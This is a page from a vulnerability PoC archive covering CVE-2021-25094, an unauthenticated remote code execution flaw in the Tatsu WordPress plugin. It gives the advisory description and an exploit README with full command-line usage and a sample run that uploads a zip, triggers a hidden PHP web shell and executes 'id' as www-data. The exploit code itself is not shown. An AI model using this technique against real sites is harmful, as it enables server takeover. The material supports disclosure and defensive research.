Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-25094 PoC — Tatsu < 3.3.12 - Unauthenticated RCE

Source
https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce
Associated Vulnerability
Title:Tatsu < 3.3.12 - Unauthenticated RCE (CVE-2021-25094)
Description:The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.
Readme
# Preauth RCE in Tatsu builder Wordpress plugin (CVE-2021-25094)

Simple PoC of an unauthenticated RCE in Tatsu Builder <= 3.3.11 provided as an example.

Full write-up here: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

Usage:
```
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress vulnerable URL (example: https://mywordpress.com/)
  cmd                   OS command to execute

optional arguments:
  -h, --help            show this help message and exit
  --technique TECHNIQUE
                        Shell technique: php | htaccess | custom
  --customShell CUSTOMSHELL
                        Provide a custom PHP shell file that will take a base64 cmd as $_POST['text'] input
  --keep KEEP           Do not auto-destruct the uploaded PHP shell
  --proxy PROXY         Specify and use an HTTP proxy (example: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        Compression level of the zip file (0 to 9, default 9)
```

Example:
```
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →